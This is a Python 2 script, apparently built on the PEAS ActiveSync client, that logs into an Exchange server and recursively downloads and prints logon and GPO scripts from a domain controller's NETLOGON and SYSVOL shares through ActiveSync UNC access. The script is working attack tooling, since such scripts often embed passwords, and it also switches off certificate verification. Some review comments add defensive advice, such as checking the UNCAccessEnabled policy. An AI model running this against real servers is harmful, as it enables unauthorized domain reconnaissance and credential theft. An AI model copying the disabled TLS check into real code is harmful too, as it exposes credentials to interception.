Enumerate GPO scripts from Exchange with F-Secure/PEAS
import peas

# Python 2 script (print statements). It drives a PEAS client against an
# Exchange server and asks it for UNC listings and files, so the file reads
# below are requested through Exchange rather than directly over SMB.
# NOTE(review): for defenders, check whether UNC access is needed at all in
# the ActiveSync mailbox policy (UNCAccessEnabled / WSSAccessEnabled) and
# confirm the setting is enforced on your Exchange version.
client = peas.Peas()

# NOTE(review): certificate verification is turned off before any credentials
# are set, so the server's identity is not checked and the password below can
# be intercepted by anyone able to sit between this host and the server.
# Prefer trusting the server's CA over disabling verification.
client.disable_certificate_verification()

#### V CONFIG SECTION V ####
# NOTE(review): placeholder values. Real credentials written into this file
# end up in shell history, backups and version control; load them at run time
# instead of committing them.
creds = {
    'server': 'exch.domain.com',
    'user': 'user',
    'password': 'pass',
}
client.set_creds(creds)

# UNC prefix of the domain controller and the AD DNS domain name; both are
# used to build the share paths that get walked.
dc = "\\\\dc"
domain = "domain.local"
#### ^ CONFIG SECTION ^ ####

# Print the authentication check result before any listing is attempted.
auth_result = client.check_auth()
print "[peas-gpo] auth ", auth_result

# \\<dc>\sysvol\<domain>\policies\ is the folder whose children are listed
# later as GPO folders.
searchbase = "".join([dc, "\\sysvol\\", domain, "\\policies\\"])
print "[peas-gpo] listing ", searchbase
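def recurse_download(path):
    """Walk the UNC folder *path* and print every script file found under it.

    The folder is listed with ``client.get_unc_listing``. Entries whose
    ``IsFolder`` is ``'1'`` are descended into, except an entry whose
    ``LinkId`` equals *path* itself. Entries whose ``LinkId`` ends in a
    script suffix are fetched with ``client.get_unc_file`` and printed to
    stdout together with their listing record.

    Nothing is returned. There is no depth limit: the only loop guard is the
    self-reference check, so a cyclic folder structure would recurse until
    Python's recursion limit is hit.

    NOTE(review): logon and startup scripts often embed passwords or
    connection strings, so whatever this prints should be handled as
    sensitive data (terminal scrollback, redirected logs, report files).
    """
    # Match on the END of the name. A substring test would also fire on names
    # such as "settings.json" (contains ".js") or on a parent folder whose
    # name contains one of these strings, fetching files that are not scripts.
    # presumably LinkId is the full UNC path ending in the file name - verify
    # against the listing records PEAS returns.
    script_suffixes = ('.bat', '.ps1', '.cmd', '.vbs', '.js')

    for subitem in client.get_unc_listing(path):
        link = subitem["LinkId"]
        if subitem['IsFolder'] == '1' and link != path:
            # Sub-folder (not the folder's own entry): descend.
            recurse_download(link)
        elif link.endswith(script_suffixes):
            print "[peas-gpo] dumping script", subitem
            print client.get_unc_file(link)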
# First pass: the NETLOGON share on the configured domain controller.
netlogon_share = dc + "\\netlogon\\"
recurse_download(netlogon_share)

# Second pass: every folder under the SYSVOL policies path whose LinkId
# contains "{" (GPO folders are named after their brace-wrapped GUID).
listing = client.get_unc_listing(searchbase)
for item in listing:
    link = item["LinkId"]
    if item["IsFolder"] != "1" or "{" not in link:
        continue
    # Strip the searchbase prefix so only the GPO folder name is shown.
    print "[peas-gpo] enumerating GPO ", link[len(searchbase):]
    recurse_download(link)